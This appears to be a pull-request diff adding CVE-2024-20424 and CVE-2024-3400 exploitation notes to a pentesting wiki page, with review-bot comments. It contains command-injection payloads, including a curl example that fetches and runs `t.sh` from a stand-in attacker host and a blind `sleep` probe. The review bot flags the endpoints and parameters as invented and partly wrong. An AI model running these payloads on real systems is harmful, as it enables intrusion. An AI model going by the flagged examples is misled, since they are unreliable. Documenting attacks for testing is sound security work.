40 changes: 39 additions & 1 deletion src/pentesting-web/command-injection.md
@@ -189,6 +189,43 @@ topicurl=<handler>&param=-n
topicurl=setEasyMeshAgentCfg&agentName=;id;
```

### Recent exploitation case studies (2024-2025)

#### CVE-2024-20424 – Cisco Secure FMC

Cisco’s October 2024 advisory describes how insufficient validation in the FMC web UI lets any authenticated Security Analyst send crafted HTTP requests that run as root on the appliance and can even relay commands to managed Firepower Threat Defense devices.

- Capture the `X-auth-access-token` issued after login, fuzz every JSON field exposed by the `/api/*` endpoints you can reach, and look for time-based delays or OOB hits when injecting shell metacharacters (`;`, `&&`, ``$()``).
- Because the issue only requires the read-only Security Analyst role, low-priv credential theft (password spraying, API key reuse, IDOR) is enough to reach a root shell.
- Successful exploitation lets you push the same malicious command set to downstream FTD sensors, so compromise of the manager often implies compromise of the fleet unless job queues are purged.

Example test once you control a session token and suspect a vulnerable endpoint:

```
curl -sk -X POST https://<fmc-host>/<vulnerable-endpoint> \
-H "X-auth-access-token: $TOKEN" \
-H "Content-Type: application/json" \
-d '{"name":"backup;curl attacker/t.sh|sh","type":"SystemTask"}'
```

Swap `<vulnerable-endpoint>` for any job/diagnostic path that reflects your user input in CLI wrappers and watch for delayed responses, DNS callbacks, or files written under `/var/sf/`.

#### CVE-2024-3400 – PAN-OS GlobalProtect Gateway

Alert Logic tracked CVE-2024-3400 as a zero-day in April 2024 that let unauthenticated attackers gain root on GlobalProtect gateways running PAN-OS 10.2.x < 10.2.9-h1, 11.0.x < 11.0.4-h1, or 11.1.x < 11.1.2-h3 before Palo Alto shipped hotfixes.

- Target appliances that expose both GlobalProtect gateway and device telemetry; whenever telemetry is enabled, arbitrary files dropped under `/opt/panlogs/tmp/device_telemetry/` will be processed with root privileges.
- Because exploitation is unauthenticated and network-facing, add these endpoints to unauthenticated fuzzing corpora and look for parameters that are piped into shell commands (e.g., HIP report fields, telemetry IDs) by chaining `;sleep 5` or DNS callbacks.

Minimal unauthenticated probe to confirm command execution via time-based payloads:

```
curl -sk -X POST https://<pan-fw>/<globalprotect-endpoint> \
--data-urlencode "telemetry_token=$(printf 'blind;sleep 6;#')"
```

Monitor response times plus outbound DNS/HTTP to confirm the payload fired without needing response data. Treat success as evidence that the management-plane user `root` executed the payload and immediately collect device telemetry bundles for further persistence hunting.

## Brute-Force Detection List


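Review bot: the two curl probes in this hunk do not exercise the mechanisms the bullets above them describe, and the identifiers they use are invented but not labelled as such. For CVE-2024-20424 the request body `{"name":"backup;curl attacker/t.sh|sh","type":"SystemTask"}`, the `<vulnerable-endpoint>` path and the `/var/sf/` artefact location are not taken from the cited Cisco advisory, which only states that a crafted HTTP request to the web-based management interface from a Security Analyst (Read Only) account runs commands as root; `X-auth-access-token` is the REST API token rather than the web UI session, so either say which interface is being probed or mark the endpoint, JSON shape and paths as placeholders. For CVE-2024-3400 the bullet says the primitive is a file dropped under `/opt/panlogs/tmp/device_telemetry/` that the telemetry job later processes as root, yet the example only POSTs a `telemetry_token` form field carrying `;sleep 6;#`, which is neither a file write nor a parameter the referenced Alert Logic article names; replace it with a request that actually creates a file in that directory or label `telemetry_token` as hypothetical, and drop the `$(printf '...')` wrapper, which only returns the literal string. The "whenever telemetry is enabled" qualifier should also be softened, since the vendor later stated that device telemetry does not need to be enabled for the flaw to be exploitable. Minor: the heading says "(2024-2025)" but both CVEs are from 2024, "IDOR" in the credential-theft list is not a credential-theft technique, and "unless job queues are purged" needs a source or should go.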
Expand All @@ -199,12 +236,13 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject

## References

- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
- [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
- [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html)
- [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php)
- [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
- [Cisco Secure Firewall Management Center – CVE-2024-20424 Advisory](https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-fmc-cmd-inj-v3AWDqN7.html)
- [Alert Logic – PAN-OS GlobalProtect CVE-2024-3400](https://support.alertlogic.com/hc/en-us/articles/360051675174-CVE-2024-3400-Palo-Alto-Networks-PAN-OS-Command-Injection-Vulnerability)

{{#include ../banners/hacktricks-training.md}}
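Review bot: the new CVE-2024-3400 entry cites an Alert Logic support article while the Cisco entry beside it cites the vendor advisory directly; for consistency add Palo Alto Networks' own advisory (https://security.paloaltonetworks.com/CVE-2024-3400), which is also the primary source for the fixed versions quoted in the section above (10.2.9-h1, 11.0.4-h1, 11.1.2-h3). Dropping the duplicated PayloadsAllTheThings line is fine.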